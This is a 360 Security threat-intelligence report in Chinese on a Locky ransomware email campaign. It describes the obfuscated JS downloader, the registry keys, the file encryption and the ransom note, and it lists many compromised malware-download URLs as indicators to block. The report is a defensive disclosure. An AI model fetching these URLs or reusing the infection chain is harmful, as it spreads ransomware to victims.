概述
自2月以来,360威胁情报中心监测到一大波勒索软件潮,国内单位组织陆续开始受到的冲击,公司对外的邮箱收到大量如下携带恶意附件的邮件。
邮件内容大致如下:
员工如不小心打开恶意附件,恶意软件会对外连接服务器下载组件,加密系统上的重要文件,要求用户付费解密。
样本行为分析
邮件附件为只有两个JS脚本的压缩包:
JS经过混淆,通过分析得知,受害者双击执行JS后创建MSXML2.XMLHTTP对象下载http:///euwiyr4hdc可执行文件,并通过WScript.Shell对象的run方法启动Locky主进程:
下载的exe经过大量的混淆处理:
进程启动后将机器ID写入HKEY_CURRENT_USER\Software\Locky\id,并将用到的加密公钥写入HKEY_CURRENT_USER\Software\Locky\pubkey:
随后木马开始遍历目录寻找.xls、.ppt、.doc、.wb2、.jpg、.wav等文件格式,使用RSA加密为Id+哈希.locky文件,并在存在文档得目录下写入恢复指导文档:
完成加密后将HKEY_CURRENT_USER\Software\Locky\completed设置为1,并通过加密的数据告知服务器:
如下是部分通信地址列表:
最后将桌面设置为恢复指导图,并弹出恢复指导文档,等待受害者交付赎金:
感染情况与建议
根据360威胁情报中心的数据,自3月以来确认中招的用户超过万人,淘宝上甚至已经出现协助代付款解密的服务。在此建议用户不要随意点击来源不明的邮件,目前360安全卫士已对此勒索软件做持续的查杀。
IOC
攻击者用于存放恶意代码的Downloader服务器大都是被攻陷的合法站点,以下是部分列表,请在边界设备上予以阻断。
http://1./engine/core/76tr5rguinml.exe
http://1./modules/images/87yhb54cdfy.exe
http://111.208.4.230:82/1Q2W3E4R5T6Y7U8I9O0P1Z2X3C4V5B//system/logs/76tr5rguinml.exe
http://120.52.72.52//c3pr90ntcsf0/system/logs/76tr5rguinml.exe
http://120.52.72.57//c3pr90ntcsf0/system/logs/4trf3g45.exe
http://178.33.176.229/ber.exe
http://2./img/multigaminator/4trf3g45.exe
http://50.28.211.199/hdd0/89o8i76u5y4
http://51457642.de./980k7j6h5
http:///wp-includes/rest-api/5h45hg4b
http:///4/0vexw3s5
http:///system/logs/086tg7
http:///87yg756f5.exe
http:///system/logs/98yhb764d.exe
http:///wp-content/plugins/87tg7v645c.exe
http:///87yg756f5.exe
http://anro./vqmod/vqcache/4trf3g45.exe
http:///system/logs/87tg7v645c.exe
http:///system/logs/765uy453gt5
http:///87yg756f5.exe
http:///libraries/simplepie/765g473bf34
http:///wp-includes/SimplePie/7ygvtyvb7niim.exe
http:///08o76g445g
http:///system/logs/87tg7v645c.exe
http:///image/templates/7ygvtyvb7niim.exe
http:///system/logs/7t6f65g.exe
http:///system/logs/87yhb54cdfy.exe
http:///89ok8jhg
http:///system/logs/7ygvtyvb7niim.exe
http://biomir./system/logs/78tgh76.exe
http:///system/logs/76tr5rguinml.exe
http:///system/cache/223
http:///system/logs/7t6f65g.exe
http://c001456.aaa./system/logs/87yg756f5.exe
http://casewerkz./system/logs/87yhb54cdfy.exe
http:///system/logs/uy78hn654e.exe
http://ccac3323.com./0y7bf3r
http:///system/logs/uy78hn654e.exe
http:///system/logs/uy78hn654e.exe
http:///system/logs/lkj87h.exe
http:///system/logs/76tr5rguinml.exe
http:///87yg756f5.exe
http:///wp-content/uploads/5h45hg4b
http:///system/logs/lkj87h.exe
http://cyberbuh./97kh65gh5
http://demo./87yg756f5.exe
http://demo./system/logs/87yhb54cdfy.exe
http://demo2./modules/payments/76tr5rguinml.exe
http://demo2./plugins/markitup/4trf3g45.exe
http:///system/logs/98yhb764d.exe
http:///system/logs/uy78hn654e.exe
http:///system/logs/76h5gf43wg54
http://donutes./system/logs/87yhb54cdfy.exe
http:///system/logs/uy78hn654e.exe
http:///system/logs/87tg7v645c.exe
http:///js/playstation4.exe
http://eiadmeodeda./8fjvimkel1/c987ah8j9ei1.php
http://e-journal./8y74hfb
http:///wp-content/themes/765g473bf34
http:///wp-admin/network/87hg8n54
http:///admin/model/87yhb54cdfy.exe
http://escortbayan./wp-content/plugins/hello123/89h8btyfde445.exe
http:///763fdvf
http://fashion-girl./catalog/controller/87hg8n54
http://fb7707vd./admin/language/4trf3g45.exe
http:///system/logs/87tg7v645c.exe
http://fkaouane./67uh54gb4
http:///87yg756f5.exe
http:///system/logs/87yhb54cdfy.exe
http:///system/logs/7t6f65g.exe
http://g200./system/logs/87yhb54cdfy.exe
http:///32tguynjk
http:///87yg756f5.exe
http:///69.exe
http:///80.exe
http:///69.exe
http:///80.exe
http://gladilki./system/library/a.exe
http:///87yg756f5.exe
http:///system/logs/7ygvtyvb7niim.exe
http:///system/logs/98yhb764d.exe
http:///69.exe
http:///80.exe
http:///099oj6hg
http:///27h8n
http:///system/logs/76tr5rguinml.exe
http://hkhc-shop./system/logs/87yg7g
http:///69.exe
http:///87yg756f5.exe
http:///system/logs/87jhg44g5
http:///69.exe
http:///80.exe
http:///80.exe
http:///system/logs/76tr5rguinml.exe
http:///system/logs/uy78hn654e.exe
http:///system/logs/4trf3g45.exe
http:///system/logs/76tr5rguinml.exe
http:///system/logs/98yhb764d.exe
http:///system/logs/7t6f65g.exe
http:///9uj8n76b5.exe
http://jewellery./system/logs/iu8y7g6b
http:///system/logs/87tg7v645c.exe
http:///69.exe
http:///80.exe
http:///76t2gr345
http://kiddyshop./image/data/87tg7v645c.exe
http:///7r5fyf6
http://kievelectric./art/media/87tg7v645c.exe
http:///87yg756f5.exe
http://kokoko./54g4
http:///system/logs/76tr5rguinml.exe
http://lahmar.choukri.perso./78hg4wg
http:///system/logs/78tgh76.exe
http:///system/logs/uy78hn654e.exe
http:///admin/controller/87yhb54cdfy.exe
http:///9uj8n76b5.exe
http:///system/logs/87tg7v645c.exe
http://liquor1./system/logs/7ygvtyvb7niim.exe
http:///wp-admin/js/765g473bf34
http:///system/logs/98yhb764d.exe
http:///adminka/templ/7ygvtyvb7niim.exe
http://mansolution./system/logs/7ygvtyvb7niim.exe
http:///978yhen2
http://maxbeauty./administrator/manifests/765g473bf34
http:///system/cache/111
http:///system/logs/uy78hn654e.exe
http:///o097jhg4g5
http:///system/logs/98yhb764d.exe
http:///system/logs/43d5f67n8
http:///system/logs/87yhb54cdfy.exe
http://nagrobkipelplin./modules/mod_wrapper/4trf3g45.exe
http:///system/logs/7t6f65g.exe
http:///87yg756f5.exe
http:///system/logs/987i6u5y4t
http:///system/logs/uy78hn654e.exe
http:///0954t4h45
http:///23r35y44y5
http:///system/logs/7ygvtyvb7niim.exe
http:///system/logs/23f3rf33.exe
http://ohbelleza./system/logs/87yhb54cdfy.exe
http:///69.exe
http:///80.exe
http:///70.exe
http:///70.exe
http:///85.exe
http:///system/logs/uy78hn654e.exe
http:///k7j6h5gf
http:///3/67t54cetvy
http://parturiencies3f9./76t2gr345
http://perfumy_alice.republika.pl/08h867g5
http:///87745g
http:///98h8n23r23
http:///system/logs/98yg7b
http:///system/logs/q32r45g54
http:///image/cache/7ygvtyvb7niim.exe
http:///system/logs/87tg7v645c.exe
http:///~pugmahons/56er5f6g7b
http://realvacantcolony./97adguwod/08h13rfi982y.php
http://regentsanctionbisexual./97adguwod/08h13rfi982y.php
http:///system/logs/lkj87h.exe
http:///wp-includes/theme-compat/765g473bf34
http:///2/87yv5cds
http:///system/logs/7ygvtyvb7niim.exe
http:///system/logs/43ghy8n
http:///wp-content/plugins/hello123/89h8btyfde445.exe
http:///system/logs/76tr5rguinml.exe
http://sales-teleselling./wp-includes/fonts/5h45hg4b
http:///67j5h5h4
http:///published/PD/87tg7v645c.exe
http:///system/logs/87tg7v645c.exe
http:///system/logs/76tr5rguinml.exe
http://shofukai.web./23rt54y56
http://shop./system/cache/111
http://shopphpmvc./system/logs/lkj87h.exe
http:///system/logs/7ygvtyvb7niim.exe
http:///system/logs/7ygvtyvb7niim.exe
http:///system/logs/78tgh76.exe
http:///5/92buyv5
http:///vqmod/xml/76tr5rguinml.exe
http:///i876jh556h
http:///786u5h
http:///wp-admin/includes/i75rg456
http:///system/logs/4trf3g45.exe
http:///73tgbf334
http:///system/logs/uy78hn654e.exe
http:///system/logs/78tgh76.exe
http://srv35613./storage/plugins/76tr5rguinml.exe
http:///43dfg7hy
http:///system/logs/uy78hn654e.exe
http://stopmeagency./9uj8n76b5.exe
http:///78jh5h
http://store./system/logs/78tgh76.exe
http://sub4./system/logs/87tg7v645c.exe
http:///wp-content/plugins/hello123/89h8btyfde445.exe
http:///system/logs/76tr5rguinml.exe
http://surfcash./0o9k7jh55
http:///system/logs/98yt
http:///system/logs/87tg7v645c.exe
http:///admin/images/7ygvtyvb7niim.exe
http:///67j5hg
http:///system/logs/56y4g45gh45h
http:///vqmod/install/7ygvtyvb7niim.exe
http://test./sdideep/87hg8n54
http:///system/logs/87tg7v645c.exe
http:///bestylethai.com/43t3gh4
http:///45tg
http:///system/logs/4trf3g45.exe
http:///system/logs/98yhb764d.exe
http:///system/logs/7ygvtyvb7niim.exe
http:///69.exe
http:///80.exe
http:///system/logs/4trf3g45.exe
http:///vqmod/xml/87yhb54cdfy.exe
http:///system/logs/87yhb54cdfy.exe
http:///system/cache/.../1.exe
http:///43f
http://tradesolutions./8i76
http:///8i67uy4g
http:///v4v5g45hg.exe
http:///image/cache/87yhb54cdfy.exe
http:///system/logs/lkj87h.exe
http:///v4v5g45hg.exe
http://u1847./system/smsgate/7ygvtyvb7niim.exe
http://ubermensch./system/logs/87yhb54cdfy.exe
http:///system/logs/uy78hn654e.exe
http:///v4v5g45hg.exe
http:///v4v5g45hg.exe
http:///v4v5g45hg.exe
http:///v4v5g45hg.exe
http://vfwuc./wp-content/uploads/5h45hg4b
http://vgp3./6/98yh8bb
http:///v4v5g45hg.exe
http:///v4v5g45hg.exe
http:///v4v5g45hg.exe
http:///v4v5g45hg.exe
http:///v4v5g45hg.exe
http:///69.exe
http:///80.exe
http://webmail./v4v5g45hg.exe
http:///v4v5g45hg.exe
http:///v4v5g45hg.exe
http:///v4v5g45hg.exe
http:///system/cache/111
http://workplace-communication./wp-includes/pomo/5h45hg4b
http://www./98o7kj56h
http://www./wp-includes/y78hiuok
http://www./wp-content/uploads/y78hiuok
http://www./system/logs/4trf3g45.exe
http://www./files/Fedex/fedex.exe
http://www./09y8j
http://www./templates/atomic/js/111.exe
http://www./files/sample.exe
http://www./98o7kj56h
http://www./9oi654gh3
http://www./9oi654gh3
http://www./873y4g7bf3
http://www./files/10003c.exe
http://www./7643grb
http://www./8y7hybigv
http://www./8y7hybigv
http://www./parallax/piatti/promt.exe
http://www./8i5ju4g34
http://www./8i5ju4g34
http://www./087hg67
http://www./4ggh45yh45
http://www.:20480/4ggh45yh45
http://www./4ggh45yh45
http://www./0k6j6n4h4
http://www./0k6j6n4h4
http://www./system/logs/7ygvtyvb7niim.exe
http://www./system/logs/87tg7v645c.exe
http://www./k8j5h
http://www./system/logs/87tg7v645c.exe
http://www./system/logs/78tgh76.exe
http://www./system/cache/87yhb54cdfy.exe
http://www./0l9k7j6
http://www./wp-content/plugins/hello123/89h8btyfde445.exe
http://www./9oi86j5hg4
http://xn--80ahetikodul.xn--p1ai/system/logs/4trf3g45.exe
http://xn--b1afonddk2l.xn--p1ai/system/logs/7t6f65g.exe
http:///system/logs/uy78hn654e.exe
http://zarabotoknasayte.zz.mu/7/sh87hg5v4
本文由 360安全播报 原创发布,如需转载请注明来源及本文地址。本文地址:http://bobao.360.cn/learning/detail/2804.html
|